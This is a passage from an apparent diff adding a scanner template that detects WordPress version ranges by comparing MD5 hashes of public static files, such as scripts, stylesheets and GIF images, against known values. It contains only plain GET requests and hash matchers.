md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"00dedd56324da186973a3b2cc5e8023c\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/mediaelement/wp-playlist.min.js" + matchers: + - type: dsl + name: 4.6 - 4.9.2 + dsl: + - "(\"264563e94e2d16b1066bd413ebc592de\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f7f63370324b974e93d8ff15c6d35765\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.2.9 + dsl: + - "(\"5fb749f8adce337f9f303136821bdf5f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"ace20386f3337c475ee213634b5422db\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"8607e87dcbb351d067d1a54485e8a357\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"564cd5d11909d4675327b6f71fa09269\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"011e67d9a7ce51e04da304564eab4eee\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"273bde000e25c739c22659cba8293fcc\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"b88b9554a163ab6eabae776b24d0d2b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js" + matchers: + - type: dsl + name: 3.9 - 5.2.9 + dsl: + - "(\"eafbb1478981e337981d287474e240b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"514f31ff2f073c993e252206da58dce0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js" + matchers: + - type: dsl + name: 4.4 - 5.2.9 + dsl: + - "(\"04fb37608ef94f9a747901b2f98b4fce\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"b229462e6a542696fbf6bd4917c9074f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"86dbf10dbce4709d79872dd5ce2219e6\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e692a8504899e953b1e96c8daaecb310\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js" + 
matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"a92e4569e92450776f18e0bb6ddae1b1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"91368350377a702b925dbcf6fa80cc8d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1842882ca7cdf96e7a1bf3e1d55691d2\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"8291a8caa3672971dc61b332ecc437c3\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"091dd1893b9d7916fd4111200ac21e3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/xit-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8fb0729c541cbdc4609faf3f4ad02fc7\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c5f831da18e837b9caf290a7866ddca6\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d9a81fb5a5e21e6d74a5e81ce37b421e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9cd381c6753a40340d85e2c57a3c35c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/xit.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"e5012902a358fbb96031acdcf048d7ca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c313ffcd0a1fe87b0a65dc2553e0ffdb\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"a815dc7ad6c4175e95bc48f3ab6832e9\" == md5(body))" + - type: dsl + name: 2.5 - 3.2.1 + dsl: + - "(\"6a03660e0544b85fc84d4de174c28741\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"94ecab09335897c4ab392bef96366e7e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-video.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"abaac3dfd81fbf72e578f13451eae7d0\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"91c6cc0f67412e41acf7bdc63d2c4ee0\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"ba34507befaa9b9b06e96c6c846bab69\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - 
"(\"bc7efebd002f34e8e6c30769ff417bdd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"c2d206df3efdc0db758b8065ad77f04a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-other.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8bc6b46bc70c7c1918dce62c4fe3229c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1f8f339019a4dea621a161a23743fa28\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"94e0e87b48fc4c7830164d48cfb41e7f\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"22dd6f85320fb13797ab7e3ff890515b\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"a55126545e825d4242990e670227f9c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-image.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"7ea2c9c157c38edb40b1ce62d572d5b3\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"62a84ad3d4d2921ecb1c0f86d8f0f790\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"538670efb6e78fcfdd4662623be4e675\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"0357183d4a361456b8b121209af5c608\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"1df8ccf3a8b6f86dbe09278ae8e60141\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"3d2cb3f7baa628c9e51a326356e72038\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"49ce47d14ff136019b315b72fa1e28e9\" == md5(body))" + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"b78fd5758e486128cf448c5973ca6ee4\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fa7ecf673cc487f349a0c1ac1f1eae30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/sort.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"2e8acb8dee99bfbcb61bd46c486a995d\" == md5(body))" + - type: dsl 
+ name: 3.9 - 4.0.32 + dsl: + - "(\"8e2fbe1407bfc897c457aa1bd3e24e1a\" == md5(body))" + - type: dsl + name: 3.1 - 3.8.35 + dsl: + - "(\"2bf510e2b04bacc1677a7a04dc318abf\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fba0b2ac81a0edbd2aa220aa92dacf33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-music.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"eff55df37f325c5aae2f02e4d913de95\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"91c40146718f73144dde29494a6f9c3c\" == md5(body))" + - type: dsl + name: 3.0 - 3.8.35 + dsl: + - "(\"423f910219d605ddd355681816a08b45\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"0fec8f86c9c036a2ecf54dbb66a63133\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"345e0f26246fc3e8a00b75662610f498\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/date-button.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"979d8e2e08aada49819556950ec48ff6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"cd3b134e8fd47881f1841a857ebd97f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"946eeed3973aa98d1833849d9a4bf8da\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"6785862d31a929183751cfa86cddfdca\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"762130cf9d24c70a2de6bdae4ce5cc54\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/date-button-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"2952932c246bf9828429361643a8bb63\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"253b7509a7739e2f5338a29f76bea171\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"5d78ee005f9f25fad855bef396a5e822\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"c28b3fbea9a861b430fdd7394a511a96\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/wp-fullscreen-stub.min.js" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"700a94e9934c7b419dfa6790b1dc4a35\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1524661e32c6718ba9ca81314b5272f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer.css" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"957da4b922728f725cb6369cc9f28957\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8831e7c4aa4ca8eff635fa01d1210aa1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer-legacy.css" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"c4eb4f7315c64a37361986e2e5d3314e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9d0ee441d256fd74d046c6a3b6188996\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-migrate.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3fefcdeb28220a3107a61ca3af3070f9\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"52bec302d465dd23422d9986af7bfa3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/moxie.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"68dec65b1e80b2b66994f4700762b65c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"5b6e97b8f1fc2f1cef763570a8b578da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"47d38d462d5fa882a92dbd2b54d5d747\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"257fc7bf0ae0ea044d61aa63b6c06f7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js" + matchers: + - type: dsl + name: 4.3 - 4.9.4 + dsl: + - "(\"25f42e049e65ee16d442799755724025\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 
+ dsl: + - "(\"0030d4ba4c429d776d23c2e37775873a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6bc47583ef2dfc50dda136132e465b5f\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.2.9 + dsl: + - "(\"959b49d52e2ff3abd7b9e48440679dff\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"a12d313609d2dfa8c9f7b1db8896ac29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_cry.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"453e7a3f8bbb417008f06d576c41d060\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"5da5f07ede5730e210dafae8d97f1f62\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"e6d886c8d4923e8242445dcda52e4395\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8f2b60c5ae6490575df6a4d5cbf09768\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_evil.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"63bf101bd3d4f7564d3cf31822218d2e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2423931c62f57d3c2976801421abbb05\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"4cc062e08ae0266dc7f083d3bb9a55f8\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"03d05e8df44d8f3eca070e7a9302e5f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_lol.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"d4f04dc65a387ca9b8c0f22ca8c0ec8c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"fe9ded95d13eaf65b383cfb6b7798108\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - 
"(\"c9d90ece68db8c95c73fa1d5b80dcc12\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6ec199f5e3ff3ad1b7268a83f9d628bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_rolleyes.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"afc8bbc65fcbd2b82a3e2c1ab41a216a\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"89077d93d01d6f71dc21674b9f545d17\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"2858c5350a62df8cb2ca03553b09a66e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"5f3587060ecb103649bdd81498c49445\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpspin-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"7def33aad959cd289d49ddf2a41f076d\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"450b52bd860e667a0fa3c00b82b58a18\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"fb714faf3721341922499a9e56c92a0c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6d53acfb07ac1bfdd0db79224389c4d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/bubble_bg-2x.gif" + matchers: + - type: dsl + name: 3.9 - 4.9.16 + dsl: + - "(\"16523d5bf9efd8ca3b92e7631edfc513\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1a76a1434d972ee849b119e69cd3f2ba\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"5bcd62dbf3804ccafc509e076fc072bb\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"cfac1d71069a6a99198c0a8a1358c23c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wpspin_light-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"7def33aad959cd289d49ddf2a41f076d\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"450b52bd860e667a0fa3c00b82b58a18\" == 
md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"fb714faf3721341922499a9e56c92a0c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6d53acfb07ac1bfdd0db79224389c4d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"433386de4a64b9ca6d74e14756bdaff6\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"c330e071f58f3c8aa254c02f11906bff\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4aa156587449104f531647e71df6da12\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"5ea02d6d347946e4d2344e336da3cf8d\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"24bd34d51376d78109ab3bcb61b66621\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"eb76120347829c4ba3576665b2d871f0\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"74ca084f6791af45527be4b531909512\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ad088d44c475a26d541c1b3988a8a274\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"2b5b1702953af1d79db2e16f477fc709\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"ea958276b7de454bd3c2873f0dc47e5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js" + matchers: + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"bf3a6ad4463d6f0d2bc861cbcb05c799\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"1209a4457fcf2627d2a93bc840fa6b5a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/backbone.js" + matchers: + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"8a8d829617513f36185a0ab055d088ec\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"222432686a333255fd0f9b8fa4d4e713\" == md5(body))" + - method: GET + 
path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"c6cc2ce4842cf34494b20855418ec7ee\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bb7500b816de10f3ada065bb1ff9c53b\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"7ceb852c73b74dc1b5f5f015be95506d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"cdabff9760b3ee59012f88238165a5d3\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"d1ce7b53e26d646fdb640f194bcbc873\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.min.js" + matchers: + - type: dsl + name: 3.7 - 4.8.15 + dsl: + - "(\"dbc3808473def00fce45fe564dc72dcb\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5b000ac69e0bc5325856cfe2ce588b88\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4534fa47fab86ef0aca5345e30ddf509\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"26737b44eebb5d66ee9af634a284b602\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"60ef76775035959651341315c9d82129\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/xfn.js" + matchers: + - type: dsl + name: 3.8 - 4.9.5 + dsl: + - "(\"e2d6eecbd774af1e2bb1a16ec117286b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"d627144ce38e26b1b1fd91b5dcb503ff\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"f3b3ae0e44fefe8c9bbb517f24c1b9bd\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"2c3b9f9d90fbe685791b2fc0db9e6e03\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"ab6a19cf026e7befa133ff49e4d27e66\" == md5(body))" + - type: dsl + name: 2.3 - 2.7.1 + dsl: + - "(\"c77c9e9a636feadfd1b2d7c07e2f2ba9\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"8de5f12403af4eb425b9ae18dad17266\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - 
"(\"ad6873245a6fbaea4904dbf8b7dd6a17\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"f715e9cd03d570820eb81c2990a2b70b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpspin.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"dd4e6dd268a70ce4c1c5143b1a4092dd\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"47c0d8a119ae5a58419577e31ab6ae6d\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"67f40a30bfa13743e5c4e86bfa467a90\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa851d7ff94a60fee301e64fdd9d932b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"b648dcfda6e61acff51cedf8b0f5bfcd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"680f6b9e75cb52aa0d40396b0cf792e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_redface.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"1c6d8b101c821641f983175221346112\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ddeac27dd6f38bce798023a25a66010a\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"00b44044422c6becd1a5c406da47c1bd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"ab6dbc90184c83abb8d6568678656813\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"bf8fd5fe9c1555cbd7ed45f9a0a81bd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wpspin_light.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"dd4e6dd268a70ce4c1c5143b1a4092dd\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"47c0d8a119ae5a58419577e31ab6ae6d\" == md5(body))" + - type: dsl + name: 2.8 - 3.8.35 + dsl: + - "(\"67f40a30bfa13743e5c4e86bfa467a90\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa851d7ff94a60fee301e64fdd9d932b\" == 
md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"b648dcfda6e61acff51cedf8b0f5bfcd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"680f6b9e75cb52aa0d40396b0cf792e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0644973027df3f85de27c60da2f331ec\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b8abf8533b9e8ed351e6f32b2b2e49c8\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"1c97af19b90531018baaebef22409f09\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"836b211538c005fe30eeeac5cb77f1ea\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"eefa6b818378b15f66df7ae4e4bcc1a7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"868832fcafbffba43f5ba4fbf31d3ca5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ca4ef58229b7d12a77bb60cc6ea231d2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"acd03e77aacb18576947d110cca65544\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"93ac996cd96a82677bf4bbd232f7fb36\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"99cdc663d5a19b883273cc555870d62f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"72dd5584fa727bd5baacf7dad434e8e1\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"762e45e43b243cdd5613822eccdb17c6\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"f422c35039c6734975166686fc7af611\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"5965d62fa0d33a604e31b2881b6c5bfa\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"bc6035ebcc286399ae80c63933562faa\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"4720a573460d8da3d0963651bdaec68c\" == md5(body))" + - 
type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"143a3d5327d5d29e881ebb29ceefacd3\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1ca6e43e5d42931eee34e8be303da579\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"86d0504f3f24934ce87ed755d6d16a98\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1755ee3900efb17a46a759c8572dc567\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"279416d29c68b762749a15d4519668b5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1e6b1ae2030a4587df5918fbd8d42d50\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"89b4d71e95967154937c6c048763b7a6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7a8fa3d526d993a0cc51ee54c37c9b70\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"1dc14d3cebe57f518905d426b4803183\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"dd3522e0b40b9053c20ddfb4d5f77d3d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"c01952804cd717c96afe10e9689bbd32\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"58d51bdeef6c8132410f1a7af5be8eec\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"7b0e9fbc77ba53dac197347efddb1e71\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"61723e2c0626c3699227340874240412\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"97969382af4adc0bd1376c79a17aadc1\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a4809c461ae933672aff7c1ba04a47b0\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"6bd3bd8591e2514b36cab474effcbbe4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/LICENSE" + matchers: + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"f578e4bb36468303006691e1a00ef996\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.3 + 
